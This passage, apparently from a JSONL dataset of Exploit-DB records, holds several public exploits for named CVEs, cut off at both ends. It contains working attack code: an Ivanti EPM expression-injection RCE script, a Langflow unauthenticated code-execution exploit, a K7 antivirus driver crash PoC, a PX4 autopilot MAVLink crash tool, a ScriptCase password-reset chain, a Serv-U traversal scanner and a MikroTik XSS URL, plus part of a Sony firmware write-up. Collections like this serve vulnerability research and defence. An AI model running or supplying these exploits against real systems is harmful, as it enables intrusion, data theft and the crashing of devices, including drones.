CVE-2025-4428: Authentication bypass on administrative endpoints\n# The vulnerabilities can be chained to achieve unauthenticated remote code execution.\n\n# Requirements:\n# - Python 3.x\n# - requests >= 2.25.1\n# - urllib3\n\n# Usage:\n# python3 CVE-2025-4427.py -t https://target-ivanti-epm.com\n# python3 CVE-2025-4427.py -t https://target-ivanti-epm.com --exploit -c \"whoami\"\n\nimport requests\nimport urllib3\nimport argparse\nfrom urllib.parse import urljoin\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nclass IvantiExploit:\n def __init__(self, target):\n self.target = target.rstrip('/') + '/'\n self.session = requests.Session()\n self.session.verify = False\n\n def detect_cve_2025_4427(self):\n \"\"\"Quick detection for CVE-2025-4427\"\"\"\n # Simple math payload for detection\n payload = '%24%7b%32%2b%32%7d' # ${2+2}\n url = f\"{self.target}mifs/rs/api/v2/featureusage?format={payload}\"\n\n try:\n resp = self.session.get(url, timeout=10)\n if resp.status_code == 400 and ('4' in resp.text or 'Process[pid' in resp.text):\n return True, \"CVE-2025-4427 VULNERABLE - Expression Language Injection\"\n except:\n pass\n return False, \"CVE-2025-4427 NOT VULNERABLE\"\n\n def exploit_rce(self, command='id'):\n \"\"\"Execute command via CVE-2025-4427\"\"\"\n # URL encode the command\n cmd_hex = command.encode().hex()\n cmd_encoded = ''.join(f'%{cmd_hex[i:i+2]}' for i in range(0, len(cmd_hex), 2))\n\n # RCE payload\n payload = f'%24%7b%22%22%2e%67%65%74%43%6c%61%73%73%28%29%2e%66%6f%72%4e%61%6d%65%28%27%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%27%29%2e%67%65%74%4d%65%74%68%6f%64%28%27%67%65%74%52%75%6e%74%69%6d%65%27%29%2e%69%6e%76%6f%6b%65%28%6e%75%6c%6c%29%2e%65%78%65%63%28%27{cmd_encoded}%27%29%7d'\n\n url = f\"{self.target}mifs/rs/api/v2/featureusage?format={payload}\"\n\n try:\n resp = self.session.get(url, timeout=15)\n if resp.status_code == 400 and 'Process[pid' in resp.text:\n return True, f\"RCE SUCCESS: {resp.text[:200]}\"\n except:\n pass\n return False, \"RCE FAILED\"\n\n def detect_cve_2025_4428(self):\n \"\"\"Quick detection for CVE-2025-4428\"\"\"\n admin_endpoints = ['/mifs/rs/api/v2/admin', '/admin', '/api/admin']\n\n for endpoint in admin_endpoints:\n try:\n url = urljoin(self.target, endpoint)\n resp = self.session.get(url, timeout=10)\n if resp.status_code == 200:\n return True, f\"CVE-2025-4428 VULNERABLE - Auth bypass on {endpoint}\"\n except:\n continue\n return False, \"CVE-2025-4428 NOT VULNERABLE\"\n\n def run_all_tests(self):\n \"\"\"Run all detection tests\"\"\"\n print(f\"[+] Testing target: {self.target}\")\n\n # Test CVE-2025-4427\n vuln_4427, msg_4427 = self.detect_cve_2025_4427()\n print(f\"[{'!' if vuln_4427 else '-'}] {msg_4427}\")\n\n # Test CVE-2025-4428\n vuln_4428, msg_4428 = self.detect_cve_2025_4428()\n print(f\"[{'!' if vuln_4428 else '-'}] {msg_4428}\")\n\n # If 4427 is vulnerable, try RCE\n if vuln_4427:\n print(\"[+] Attempting RCE...\")\n rce_success, rce_msg = self.exploit_rce('whoami')\n print(f\"[{'!' if rce_success else '-'}] {rce_msg}\")\n\n return vuln_4427 or vuln_4428\n\ndef main():\n banner = \"\"\"\n--[[\n .___ __ .__ _____________________ _____ _____\n | |__ _______ _____/ |_|__| \\_ _____/\\______ \\/ \\ / \\\n | \\ \\/ /\\__ \\ / \\ __\\ | | __)_ | ___/ \\ / \\ / \\ / \\\n | |\\ / / __ \\| | \\ | | | | \\ | | / Y \\/ Y \\\n |___| \\_/ (____ /___| /__| |__| /_______ / |____| \\____|__ /\\____|__ /\n \\/ \\/ \\/ \\/ \\/\n--]]\n \"\"\"\n print(banner)\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-t', '--target', required=True, help='Target URL (e.g., https://target.com)')\n parser.add_argument('-c', '--command', default='id', help='Command to execute (default: id)')\n parser.add_argument('--explo", "cve_id": "CVE-2025-4427", "source": "exploitdb", "timestamp": "2025-08-26T00:00:00+00:00"} {"id": "a56514fdfc09b5e27111", "text": "K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS)\n\n# Exploit Title: K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS)\n# Date: 13.08.2024\n# Author: M. Akil Gündoğan\n# Vendor Homepage: https://k7computing.com/\n# Version: < v17.0.2019\n# Tested on: Windows 10 Pro x64\n# CVE ID: CVE-2024-36424\n\n# Vulnerability Description:\n--------------------------------------\nIn K7 Ultimate Security < v17.0.2019, the driver file (K7RKScan.sys - this version 15.1.0.7) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of null pointer dereference from IOCtl 0x222010 and 0x222014. At the same time, the drive is accessible to all users in the \"Everyone\" group.\n\n# Technical details and step by step Proof of Concept's (PoC):\n--------------------------------------\n1 - Install the driver in the path \"C:\\Program Files (x86)\\K7 Computing\\K7TSecurity\\K7TSecurity\\64Bit\\K7RKScan.sys\" to the system via OSRLoader or sc create.\n\n2 - Compile the attached PoC code written in C++ as release on VS 2022.\n\n3 - Run the compiled PoC directly with a double click. You will see the system crash/BSOD.\n\n# Impact:\n--------------------------------------\nAn attacker with unauthorized user access can cause the entire system to crash and terminate critical processes, including any antivirus process where the relevant driver is activated and used on the system.\n\n# Advisories:\n--------------------------------------\nK7 Computing recommends that all customers update their products to the corresponding versions shown below:\n\nK7 Ultimate Security (17.0.2019 or Higher)\n\n# Timeline:\n--------------------------------------\n- 16.05.2024 - Vulnerability reported.\n- 05.08.2024 - Vendor has fixed the vulnerability.\n- 13.08.2024 - Released.\n\n# References:\n--------------------------------------\n- Vendor: https://www.k7computing.com\n- Advisory: https://support.k7computing.com/index.php?/selfhelp/view-article/Advisory-issued-on-5th-aug-2024-417\n- CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36424\n- Repository: https://github.com/secunnix/CVE-2024-36424\n\n# PoC Code (C++):\n-------------------------------------------------------------------------------------------------------------------------\n\n/*\n# Usage: Only compile it and run, boooom :)\n*/\n\n#include \n#include \n\nconst std::wstring driverDevice = L\"\\\\\\\\.\\\\DosK7RKScnDrv\"; // K7RKScan.sys symbolic link path\nconst DWORD ioCTL = 0x222010; // IOCTL 0x222010 or 0x222014\n\nint main() {\n std::cout << \"K7 Ultimae Security < v17.0.2019 K7RKScan.sys Null Pointer Dereference - PoC\" << std::endl;\n HANDLE hDevice = CreateFile(driverDevice.c_str(),\n GENERIC_READ | GENERIC_WRITE,\n 0,\n nullptr,\n OPEN_EXISTING,\n 0,\n nullptr);\n\n if (hDevice == INVALID_HANDLE_VALUE) {\n std::cerr << \"Failed, please load driver and check again. Exit... \" << GetLastError() << std::endl;\n return 1;\n }\n\n void* inputBuffer = nullptr; // Null input buffer\n DWORD inputBufferSize = 0;\n\n DWORD bytesReturned;\n BOOL result = DeviceIoControl(hDevice,\n ioCTL,\n inputBuffer,\n inputBufferSize,\n nullptr,\n 0,\n &bytesReturned,\n nullptr);\n\n if (!result) {\n std::cerr << \"DeviceIoControl failed. Exit... \" << GetLastError() << std::endl;\n }\n\n CloseHandle(hDevice);\n\n return 0;\n}", "cve_id": "CVE-2024-36424", "source": "exploitdb", "timestamp": "2025-04-10T00:00:00+00:00"} {"id": "c110c2509a6cf4b3f316", "text": "Langflow 1.3.0 - Remote Code Execution (RCE)\n\n# Exploit Title: Langflow 1.3.0 - Remote Code Execution (RCE)\n# Date: 2025-04-17\n# Exploit Author: VeryLazyTech\n# Vendor Homepage: http://www.langflow.org/\n# Software Link: https://github.com/langflow-ai/langflow\n# Version: Langflow < 1.3.0\n# Tested on: Windows Server 2019\n# CVE: CVE-2025-3248\n# CVE-2025-3248 - Remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code\n# FOFA \"Langflow\"\n# Medium: https://medium.com/@verylazytech\n# GitHub: https://github.com/verylazytech\n# Shop: https://shop.verylazytech.com\n# Website: https://www.verylazytech.com\n\nimport argparse\nimport requests\nimport json\nfrom urllib.parse import urljoin\nimport random\nfrom colorama import init, Fore, Style\n\n# Disable SSL warnings\nrequests.packages.urllib3.disable_warnings()\n\n# Initialize colorama\ninit(autoreset=True)\n\n# Constants\nENDC = \"\\033[0m\"\nENCODING = \"UTF-8\"\nCOLORS = [Fore.GREEN, Fore.CYAN, Fore.BLUE]\n\ndef banner():\n random_color = random.choice(COLORS)\n return f\"\"\"{Style.BRIGHT}{random_color}\n ______ _______ ____ ___ ____ ____ _________ _ _ ___\n / ___\\ \\ / / ____| |___ \\ / _ \\___ \\| ___| |___ /___ \\| || | ( _ )\n| | \\ \\ / /| _| __) | | | |__) |___ \\ |_ \\ __) | || |_ / _ \\\n| |___ \\ V / | |___ / __/| |_| / __/ ___) | ___) / __/|__ _| (_) |\n \\____| \\_/ |_____| |_____|\\___/_____|____/ |____/_____| |_| \\___/\n\n\n__ __ _ _____ _\n\\ \\ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__\n \\ \\ / / _ \\ '__| | | | | | / _` |_ / | | | | |/ _ \\/ __| '_ \\\n \\ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | |\n \\_/ \\___|_| \\__, | |_____\\__,_/___|\\__, | |_|\\___|\\___|_| |_|\n |___/ |___/\n\n {Style.BRIGHT}{Fore.WHITE}@VeryLazyTech - Medium {Style.RESET_ALL}\\n\n{Style.RESET_ALL}\n\"\"\"\n\nprint(banner())\n\nclass LangflowScanner:\n def __init__(self, url, timeout=10):\n self.url = url.rstrip('/')\n self.timeout = timeout\n self.session = requests.Session()\n self.session.verify = False\n self.session.headers.update({\n 'User-Agent': 'Mozilla/5.0',\n 'Content-Type': 'application/json',\n 'Accept': 'application/json',\n })\n\n def exploit(self, command):\n endpoint = urljoin(self.url, '/api/v1/validate/code')\n payload = {\n \"code\": f\"\"\"\ndef run(cd=exec('raise Exception(__import__(\"subprocess\").check_output(\"{command}\", shell=True))')): pass\n\"\"\"\n }\n\n try:\n print(f\"{Fore.YELLOW}[*] Sending payload to {endpoint}\")\n response = self.session.post(endpoint, json=payload, timeout=self.timeout)\n print(f\"{Fore.YELLOW}[*] Status Code: {response.status_code}\")\n print(f\"{Fore.YELLOW}[*] Raw Response: {response.text}\")\n\n if response.status_code == 200:\n try:\n data = response.json()\n error_msg = data.get(\"function\", {}).get(\"errors\", [\"\"])[0]\n if isinstance(error_msg, str) and error_msg.startswith(\"b'\"):\n output = error_msg[2:-1].encode().decode('unicode_escape').strip()\n return output\n except Exception as e:\n return f\"[!] Failed to parse response: {str(e)}\"\n return f\"[!] Exploit failed with status {response.status_code}\"\n except requests.RequestException as e:\n return f\"[!] Request failed: {str(e)}\"\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Langflow CVE-2025-3248 Exploit\")\n parser.add_argument(\"url\", help=\"Target base URL (e.g., http://host:port)\")\n parser.add_argument(\"cmd\", help=\"Command to execute (e.g., whoami)\")\n args = parser.parse_args()\n\n scanner = LangflowScanner(args.url)\n result = scanner.exploit(args.cmd)\n print(f\"{Fore.GREEN}[+] Command Output:\\n{result}\")\n\nif __name__ == \"__main__\":\n main()", "cve_id": "CVE-2025-3248", "source": "exploitdb", "timestamp": "2025-04-18T00:00:00+00:00"} {"id": "f52d8d7ba442b21e9315", "text": "MikroTik RouterOS 7.19.1 - Reflected XSS\n\n# Exploit Title: MikroTik RouterOS 7.19.1 - Reflected XSS\n# Google Dork: inurl:/login?dst=\n# Date: 2025-07-15\n# Exploit Author: Prak Sokchea\n# Vendor Homepage: https://mikrotik.com\n# Software Link: https://mikrotik.com/download\n# Version: RouterOS <= 7.19.1\n# Tested on: MikroTik CHR 7.19.1\n# CVE : CVE-2025-6563\n\n# PoC:\n# Visit the following URL while connected to the vulnerable MikroTik hotspot service:\n# http:///login?dst=javascript:alert(3)\n\n# A reflected XSS will be triggered when the dst parameter is not properly sanitized by the server-side logic.\n# This vulnerability requires user interaction (visiting the link) and may be used in phishing or redirection attacks.\n\n# Notes:\n# This is a non-persistent reflected XSS. It is accepted due to the presence of a valid CVE (CVE-2025-6563),\n# and has been acknowledged by MikroTik as a valid issue.", "cve_id": "CVE-2025-6563", "source": "exploitdb", "timestamp": "2025-07-16T00:00:00+00:00"} {"id": "8c3f931fd52fa10e1772", "text": "PX4 Military UAV Autopilot 1.12.3 - Denial of Service (DoS)\n\n# Exploit Title: PX4 Military UAV Autopilot 1.12.3 - Denial of Service (DoS)\n# Author: Mohammed Idrees Banyamer (@banyamer_security)\n# GitHub: https://github.com/mbanyamer\n# Date: 2025-06-21\n# Tested on: Ubuntu 20.04 LTS + PX4 SITL (jMAVSim)\n# CVE: CVE-2025-5640\n# Type: Denial of Service (DoS) via Buffer Overflow\n# Platform: Cross-platform (Military UAVs / PX4 SITL / Linux-based autopilot ground station)\n# Author Country: Jordan\n# Description:\n# A stack-based buffer overflow vulnerability in PX4 Military UAV Autopilot <=1.12.3 is triggered\n# when handling a malformed MAVLink message of type TRAJECTORY_REPRESENTATION_WAYPOINTS.\n# An attacker with access to the MAVLink communication channel can send a crafted packet\n# to crash the autopilot, potentially disrupting military UAV operations. This exploit demonstrates\n# a proof-of-concept that causes the PX4 autopilot to crash via UDP.\n\n\nimport argparse\nimport binascii\nfrom pymavlink import mavutil\nimport sys\n\n# Exploit payload (malformed MAVLink hex)\nhex_payload = (\n \"fdef0000dcea6f4c01006de9d06a0548182a1fcc8b7cc542eb8945a54baa92ee908db9af0195bb5dce5f9ab613be912485d34e577c352\"\n \"c5cdc06592484be1aecd64a07127bda31fc8f41f300a9e4a0eab80d8835f106924f0b89ece3e256dda30e3001f07df4e1633e6f827b78\"\n \"12731dbc3daf1e81fc06cea4d9c8c1525fb955d3eddd7454b54bb740bcd87b00063bd9111d4fb4149658d4ccd92974c97c7158189a8d6\"\n)\n\ndef connect_to_px4(ip, port, timeout, verbose=False):\n try:\n if verbose:\n print(f\"[*] Connecting to PX4 at udp:{ip}:{port} ...\")\n master = mavutil.mavlink_connection(f\"udp:{ip}:{port}\")\n master.wait_heartbeat(timeout=timeout)\n if verbose:\n print(\"[+] PX4 heartbeat received. Connection OK.\")\n return master\n except Exception as e:\n print(f\"[!] Error connecting to PX4: {e}\")\n sys.exit(1)\n\ndef send_dos_packet(master, verbose=False):\n try:\n payload = binascii.unhexlify(hex_payload)\n master.write(payload)\n print(\"[+] Exploit packet sent. Monitor PX4 for crash.\")\n except Exception as e:\n print(f\"[!] Failed to send payload: {e}\")\n sys.exit(1)\n\ndef main():\n usage = \"\"\"\n PX4 Exploit Tool - CVE-2025-5640\n =================================\n Exploit a buffer overflow vulnerability in PX4 autopilot via MAVLink.\n\n USAGE:\n python3 px4_exploit_tool.py [OPTIONS]\n\n EXAMPLES:\n # Run DoS attack on default PX4 SITL\n python3 px4_exploit_tool.py --mode dos\n\n # Test connectivity to a real drone\n python3 px4_exploit_tool.py --mode check --ip 192.168.10.10 --port 14550\n\n OPTIONS:\n --ip Target IP address (default: 127.0.0.1)\n --port Target UDP port (default: 14540)\n --mode Mode of operation: dos (default), check\n --timeout Timeout in seconds for heartbeat (default: 5)\n --verbose Enable verbose output\n \"\"\"\n parser = argparse.ArgumentParser(\n description=\"PX4 MAVLink DoS Exploit Tool (CVE-2025-5640) by @banyamer_security\",\n epilog=usage,\n formatter_class=argparse.RawDescriptionHelpFormatter\n )\n parser.add_argument(\"--ip\", default=\"127.0.0.1\", help=\"Target IP address (default: 127.0.0.1)\")\n parser.add_argument(\"--port\", type=int, default=14540, help=\"Target UDP port (default: 14540)\")\n parser.add_argument(\"--timeout\", type=int, default=5, help=\"Timeout in seconds for heartbeat (default: 5)\")\n parser.add_argument(\"--mode\", choices=[\"dos\", \"check\"], default=\"dos\", help=\"Mode: dos (default) or check connection\")\n parser.add_argument(\"--verbose\", action=\"store_true\", help=\"Enable verbose output\")\n\n args = parser.parse_args()\n\n master = connect_to_px4(args.ip, args.port, args.timeout, args.verbose)\n\n if args.mode == \"check\":\n print(\"[*] PX4 is alive. Connection test passed.\")\n elif args.mode == \"dos\":\n send_dos_packet(master, args.verbose)\n\n\nif __name__ == \"__main__\":\n main()", "cve_id": "CVE-2025-5640", "source": "exploitdb", "timestamp": "2025-06-26T00:00:00+00:00"} {"id": "215615a63f4ff15b103e", "text": "ScriptCase 9.12.006 (23) - Remote Command Execution (RCE)\n\n# Exploit Title: ScriptCase 9.12.006 (23) - Remote Command Execution (RCE)\n# Date: 04/07/2025\n# Exploit Author: Alexandre ZANNI (noraj) & Alexandre DROULLÉ (cabir)\n# Vendor Homepage: https://www.scriptcase.net/\n# Software Link: https://www.scriptcase.net/download/\n# Version: 1.0.003-build-2 (Production Environment) / 9.12.006 (23) (ScriptCase)\n# Tested on: EndeavourOS\n# CVE : CVE-2025-47227, CVE-2025-47228\n# Source: https://github.com/synacktiv/CVE-2025-47227_CVE-2025-47228\n# Advisory: https://www.synacktiv.com/advisories/scriptcase-pre-authenticated-remote-command-execution\n\n# Imports\n## stdlib\nimport io\nimport random\nimport optparse\nimport re\nimport string\nimport sys\nimport urllib.parse\n## third party\nfrom PIL import Image, ImageEnhance, ImageFilter # pip3 install Pillow\nimport pytesseract # pip3 install pytesseract\nimport requests # pip install requests\nfrom bs4 import BeautifulSoup # pip install beautifulsoup4\n\n# Clean image + OCR\ndef process_image(input_image, output_image_path=None):\n # Open the image\n img = Image.open(io.BytesIO(input_image))\n\n # Convert the image to RGB (in case it's in a different mode)\n img = img.convert('RGB')\n\n # Load the pixel data\n pixels = img.load()\n\n # Get the dimensions of the image\n width, height = img.size\n\n # Process each pixel\n for y in range(height):\n for x in range(width):\n r, g, b = pixels[x, y]\n # Change the crap background to a fixed color (letters are only black or white, and background is random color but not black or white)\n if (r, g, b) != (0, 0, 0) and (r, g, b) != (255, 255, 255):\n pixels[x, y] = (211, 211, 211) # Change the pixel to light grey\n elif (r, g, b) == (255, 255, 255): # Change white text in black text\n pixels[x, y] = (0, 0, 0) # Change the pixel to black\n\n # Size (200, 50) * 5\n img = img.resize((1000,250), Image.Resampling.HAMMING)\n\n # Use Tesseract to convert the image to text\n # psm 6 or 8 work best\n # limit alphabet\n # disable word optimized detection https://github.com/tesseract-ocr/tessdoc/blob/main/ImproveQuality.md#dictionaries-word-lists-and-patterns\n custom_oem_psm_config = rf'--psm 8 --oem 3 -c tessedit_char_whitelist={string.ascii_letters} -c load_system_dawg=false -c load_freq_dawg=false --dpi 300' # there are only uppercase but keep lowercase to avoid false negative\n text = pytesseract.image_to_string(img, config=custom_oem_psm_config)\n return(text.upper().strip()) # convert false positive lowercase to uppercase, strip because leading whitespace is often added\n\n# Step 1: Set is_page to true on the session\ndef prepare_session(url_base, cookies):\n res = requests.get(\n f'{url_base}/prod/lib/php/devel/iface/login.php',\n cookies=cookies,\n verify=False\n )\n if res.status_code == 200:\n print(\"[+] Session prepared\")\n else:\n print(f\"[-] Failed with status code {res.status_code}\")\n\n# Random hex string of arbitrary size\ndef rand_hex(size):\n return ''.join(random.choice('0123456789abcdef') for _ in range(size))\n\n# Step 2: Get a captcha challenge for the session\ndef captcha_session(url_base, cookies):\n res = requests.get(\n f'{url_base}/prod/lib/php/devel/lib/php/secureimage.php',\n cookies=cookies,\n verify=False\n )\n if res.status_code == 200:\n print(\"[+] Captcha retrieved\")\n return res.content\n else:\n print(f\"[-] Failed with status code {res.status_code}\")\n\n# Step 3: Change the password with the prepared session\ndef reset_password(url_base, cookies, captcha_img, captcha_txt):\n new_password = random.choice(string.ascii_letters).capitalize() + rand_hex(10) + str(random.randint(0,9))\n email = f'{rand_hex(10)}@{rand_hex(8)}.com'\n data = {\n 'ajax': 'nm',\n 'nm_action': 'change_pass',\n 'email': email,\n 'pass_new': new_password,\n 'pass_conf': new_password,\n 'lang': 'en-us',\n 'captcha': captcha_txt\n }\n res = requests.post(\n f'{url_base}/prod/lib/php/devel/iface/login.php',\n data=data,\n cookies=cookies,\n verify=False\n )\n if res.status_code == 200 and res.text == '{\"result\":\"success\"}':\n print(\"[+] Password reset successfully\")\n print(f\"[+] The new password is: {new_password}\")\n print(f\"[+] The delcared (fake) email address was: {email}\")\n elif res.status_code == 200 and res.text == '{\"result\":\"error\",\"message\":\"Invalid captcha\"}':\n print(\"[-] OCR failed\")\n print(f\"[-] Failed captcha submission was {captcha_txt}\")\n img = Image.open(io.BytesIO(captcha_img))\n img.show()\n manual_input = input(\"[+] Input displayed captcha to retry manually: \")\n reset_password(url_base, cookies, captcha_img, manual_input)\n elif res.status_code == 200 and res.text == '{\"result\":\"error\",\"message\":\"The password is incorrect.", "cve_id": "CVE-2025-47228", "source": "exploitdb", "timestamp": "2025-07-08T00:00:00+00:00"} {"id": "811a066e99e7f678956a", "text": "SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal\n\n# Exploit Title: SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal\n# Date: 2025-05-28\n# Exploit Author: @ibrahimsql\n# Exploit Author's github: https://github.com/ibrahimsql\n# Vendor Homepage: https://www.solarwinds.com/serv-u-managed-file-transfer-server\n# Software Link: https://www.solarwinds.com/serv-u-managed-file-transfer-server/registration\n# Version: <= 15.4.2 HF1\n# Tested on: Kali Linux 2024.1\n# CVE: CVE-2024-28995\n# Description:\n# SolarWinds Serv-U was susceptible to a directory traversal vulnerability that would allow\n# attackers to read sensitive files on the host machine. This exploit demonstrates multiple\n# path traversal techniques to access Serv-U log files and other system files on both\n# Windows and Linux systems.\n#\n# References:\n# - https://nvd.nist.gov/vuln/detail/cve-2024-28995\n# - https://www.rapid7.com/blog/post/2024/06/11/etr-cve-2024-28995-trivially-exploitable-information-disclosure-vulnerability-in-solarwinds-serv-u/\n# - https://thehackernews.com/2024/06/solarwinds-serv-u-vulnerability-under.html\n\n# Requirements: urllib3>=1.26.0 , colorama>=0.4.4 , requests>=2.25.0\n\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport argparse\nimport concurrent.futures\nimport json\nimport os\nimport re\nimport sys\nimport time\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nfrom urllib.parse import urlparse\n\nimport requests\nfrom colorama import Fore, Back, Style, init\n\n# Initialize colorama\ninit(autoreset=True)\n\n# Disable SSL warnings\ntry:\n import urllib3\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\nexcept ImportError:\n pass\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\nBANNER = rf'''\n{Fore.CYAN}\n ______ _______ ____ ___ ____ _ _ ____ ___ ___ ___ ____\n / ___\\ \\ / / ____| |___ \\ / _ \\___ \\| || | |___ \\( _ )/ _ \\ / _ \\| ___|\n | | \\ \\ / /| _| _____ __) | | | |__) | || |_ _____ __) / _ \\ (_) | (_) |___ \\\n | |___ \\ V / | |__|_____/ __/| |_| / __/|__ _|_____/ __/ (_) \\__, |\\__, |___) |\n \\____| \\_/ |_____| |_____|\\___/_____| |_| |_____\\___/ /_/ /_/|____/\n{Fore.YELLOW}\n SolarWinds Serv-U Directory Traversal Exploit\n{Fore.RED} CVE-2024-28995 by @ibrahimsql\n{Style.RESET_ALL}\n'''\n\nclass ScanResult:\n def __init__(self, url, is_vulnerable=False, version=None, os_type=None, file_content=None, path=None):\n self.url = url\n self.is_vulnerable = is_vulnerable\n self.version = version\n self.os_type = os_type\n self.file_content = file_content\n self.path = path\n self.timestamp = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n def to_dict(self):\n return {\n \"url\": self.url,\n \"is_vulnerable\": self.is_vulnerable,\n \"version\": self.version,\n \"os_type\": self.os_type,\n \"path\": self.path,\n \"timestamp\": self.timestamp\n }\n\ndef print_banner():\n print(BANNER)\n\ndef normalize_url(url):\n \"\"\"Normalize URL to ensure it has http/https protocol.\"\"\"\n if not url.startswith('http'):\n url = f\"https://{url}\"\n return url.rstrip('/')\n\ndef extract_server_version(headers):\n \"\"\"Extract Serv-U version from server headers if available.\"\"\"\n if 'Server' in headers:\n server_header = headers['Server']\n # Look for Serv-U version pattern\n match = re.search(r'Serv-U/(\\d+\\.\\d+\\.\\d+)', server_header)\n if match:\n return match.group(1)\n return None\n\ndef is_vulnerable_version(version):\n \"\"\"Check if the detected version is vulnerable (15.4.2 HF1 or lower).\"\"\"\n if not version:\n return None\n\n try:\n # Split version numbers\n major, minor, patch = map(int, version.split('.'))\n\n # Vulnerable if lower than 15.4.2 HF2\n if major < 15:\n return True\n elif major == 15:\n if minor < 4:\n return True\n elif minor == 4:\n if patch <= 2: # We're assuming patch 2 is 15.4.2 HF1 which is vulnerable\n return True\n except:\n pass\n\n return False\n\ndef get_request(url, timeout=15):\n \"\"\"Make a GET request to the specified URL.\"\"\"\n try:\n response = requests.get(url, verify=False, timeout=timeout, allow_redirects=False)\n return response\n except requests.RequestException as e:\n return None\n\ndef detect_os_type(content):\n \"\"\"Detect the operating system type from the file content.\"\"\"\n if any(indicator in content for indicator in [\"root:\", \"bin:x:\", \"daemon:\", \"/etc/\", \"/home/\", \"/var/\"]):\n return \"Linux\"\n elif any(indicator in content for indicator in [\"[fonts]\", \"[extensions]\", \"[Mail]\", \"Windows\", \"ProgramData\", \"Program Files\"]):\n return \"Windows\"\n return None\n\ndef get_default_payloads():\n \"\"\"Return a list of directory traversal payloads specific to CVE-2024-28995.\"\"\"\n return [\n # Windows payloads - Serv-U specific files\n ", "cve_id": "CVE-2024-28995", "source": "exploitdb", "timestamp": "2025-05-29T00:00:00+00:00"} {"id": "7d70f8105a01669b0223", "text": "Sony XAV-AX5500 1.13 - Firmware Update Validation Remote Code Execution (RCE)\n\n# Exploit Title: Sony XAV-AX5500 Firmware Update Validation Remote Code Execution\n# Date: 11-Feb-2025\n# Exploit Author: lkushinada\n# Vendor Homepage: https://www.sony.com/et/electronics/in-car-receivers-players/xav-ax5500\n# Software Link: https://archive.org/details/xav-ax-5500-v-113\n# Version: 1.13\n# Tested on: Sony XAV-AX5500\n# CVE : CVE-2024-23922\n\n# From NIST CVE Details:\n# ====\n# This vulnerability allows physically present attackers to execute arbitrary code on affected\n# installations of Sony XAV-AX5500 devices. Authentication is not required to exploit this\n# vulnerability. The specific flaw exists within the handling of software updates. The issue\n# results from the lack of proper validation of software update packages. An attacker can leverage\n# this vulnerability to execute code in the context of the device.\n# Was ZDI-CAN-22939\n# ====\n\n# # Summary\n# Sony's firmware validation for a number of their XAV-AX products relies on symetric cryptography,\n# obscurity of their package format, and a weird checksum method instead of any real firmware\n# signing mechanism. As such, this can be exploited to craft updates which bypass firmware validation\n# and allow a USB-based attacker to obtain RCE on the infotainment unit.\n\n# What's not mentioned in the CVE advisories, is that this method works on the majority of Sony's\n# infotainment units and products which use a similar chipset or firmware package format. Tested\n# to work on most firmware versions prior to v2.00.\n\n# # Threat Model\n# An attacker with physical access to an automotive media unit can typically utilize other methods\n# to achieve a malicious outcome. The reason to investigate the firmware to the extent in this post\n# is academic, exploratory, and cautionary, i.e. what other systems are protected in a similar\n# manner? if they are, how trivial is it to bypass?\n\n# # Disclaimer\n# The information in this article is for educational purposes only.\n# Tampering with an automotive system comes with risks which, if you don't understand, you should\n# not be undertaking.\n# THE AUTHORS DISCLAIM ANY AND ALL RESPONSIBILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES ARISING\n# FROM THE USE OF ANYTHING IN THIS DOCUMENT.\n\n\n# # The Unit\n# ## Processors\n# - DAC\n# - System Management Controller (SMC)\n# - Applications Processor\n# - Display Processor\n\n# Coming from a mobile and desktop computer environment, one may be use to thinking about\n# the Applications Processor as the most powerful chip in the system in terms of processing power,\n# size, power consumption, and system hierarchy. The first oddity of this platform is that the\n# application processor is not the most powerful; that honor goes to the DAC, a beefy ARM chip on the\n# board.\n\n# The application processor does not appear to be the orchestrator of the components on the system.\n# The SMC tkes which takes the role of watchdog, power state management, and input (think remote\n# controls, steering wheel button presses) routing.\n# For our purposes, it is the Applications processor we're interested in, as it is\n# the system responsible for updating the unit via USB.\n\n# ## Interfaces\n# We're going to be attacking the unit via USB, as it's the most readily exposed\n# interface to owners and would-be attackers.\n# Whilst the applications processor does have a UART interface, the most recent iterations of the\n# unit do not expose any headers for debugging via UART, and the one active UART line found to be\n# active was for message passing between the SMC and app processor, not debug purposes. Similarly, no\n# exposed JTAG interfaces were found to be readily exposed on recent iterations of the unit. Sony's\n# documentation suggests these are not enabled, but this could not be verified during testing. At the\n# very least, JTAG was not found to be exposed on an accessible interface.\n\n# ## Storage\n# The boards analyzed had two SPI NOR flash chips, one with an unencrypted firmware image on it. This\n# firmware was RARd. The contents of SPI flash was analyzed to determine many of the details\n# discussed in this report.\n\n# ## The Updater\n# Updates are provided on Sony's support website. A ZIP package is provided with three files:\n# - SHDS1132.up6\n# - SHMC1132.u88\n# - SHSO1132.fir\n# The largest of these files (8 meg), the .fir, is in a custom format, and appears encrypted.\n# The FIR file has a header which contains the date of firmware publication, the strings KRSELCO and\n# SKIP, a chunk of zeros, and then a highish entropy section, and some repeating patterns of interest:\n\n# 00002070 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\\|\n# *\n# 00002860 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\\|\n\n# 00744110 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\\|\n# *\n# 00800020 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\\|\n\n\n# ## SPI Flash\n# Dumping the contents of the SPI f", "cve_id": "CVE-2024-23922", "source": "exploitdb", "timestamp": 